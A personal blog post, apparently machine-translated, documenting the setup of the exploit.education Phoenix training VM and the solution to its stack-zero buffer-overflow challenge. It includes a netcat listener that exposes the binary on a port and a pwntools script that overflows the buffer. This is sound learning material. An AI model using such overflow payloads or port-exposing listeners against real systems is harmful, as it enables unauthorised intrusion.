BuringStraw

BuringStraw

HomeArchives

[pwn Notes 0] Phoenix Environment Setup and stack-zero

#pwn#stack74
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
The article discusses setting up the Phoenix environment and completing the stack-zero challenge in the context of learning pwn. It includes instructions for configuring the environment, using netcat for program forwarding, and exploiting the stack-zero program. The author also mentions using pwntools for the challenge and successfully completing it.

I found a project to learn pwn at http://exploit.education, and decided to temporarily learn pwn to get on the right track. I'll try starting a note series (I always forget how to write pwntools scripts), hoping not to give up halfway. Set a small goal, at least finish the Phoenix series.

Environment Setup#

First, download the virtual machine image of Phoenix in the more-downloads section, choose according to your architecture. This is the target machine. Before starting, we need to install qemu-system-x86 (64-bit is also in the same package (archlinux))

Run boot-balabala.sh to start the virtual machine, which opens ssh on port 2222 by default. The username and password are both user.

If you want to use netcat to forward the programs inside, just add another port forwarding in the startup script, here is an example of the entire line for the network.

-netdev user,id=unet,hostfwd=tcp:127.0.0.1:2222-:22,hostfwd=tcp:127.0.0.1:3333-:3333

Then, execute the following command inside the virtual machine.

mkfifo io

And create a script file (start.sh)

#!/bin/bash
cat io|$1 -i 2>&1|nc -l 3333 > io

Then you can start netcat by using sh start.sh /opt/phoenix/amd64/stack-zero, remember to match the port 3333 with the one in the startup script.

The gdb in the virtual machine is installed with gef by default, but I don't know how to use it very well, so I copied a copy of peda into it. Skipping.

Install a very convenient pwntools on the host machine: pip install pwntools

stack-zero#

The program is relatively simple, so I used cutter directly.

![Screenshot_Select_Area_20230215183930.png](/pics/[pwn Notes 0] Setting up Phoenix Environment and stack-zero 366826c7bb10483aa08121888111f984/Screenshot_Select_Area_20230215183930.png)

(Actually, the source code is provided on the exploit.education website) (The comment at the beginning is even a joke)

Now we want to overflow s into var_10h (changeme), the content can be anything. Open gdb, calculate the distance, and input something randomly first.

![Untitled](/pics/[pwn Notes 0] Setting up Phoenix Environment and stack-zero 366826c7bb10483aa08121888111f984/Untitled.png)

The string is at 0x620.

![Untitled](/pics/[pwn Notes 0] Setting up Phoenix Environment and stack-zero 366826c7bb10483aa08121888111f984/Untitled%201.png)

The conditional statement, changeme is at rbp-0x10, which is 0x670-0x10.

Calculate 0x660-0x620=0x40.

So we just need to output 0x41 'a's.

To practice using pwntools, write some code.

Here I connected directly using ssh, no need for nc.

from pwn import *

shell = ssh("user", "localhost", password="user", port=2222)
sh = shell.run("/opt/phoenix/amd64/stack-zero")
print(sh.recvline())
sh.sendline(b"a"*0x41)
print(sh.recvline())
shell.close()

Success

![Untitled](/pics/[pwn Notes 0] Setting up Phoenix Environment and stack-zero 366826c7bb10483aa08121888111f984/Untitled%202.png)

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.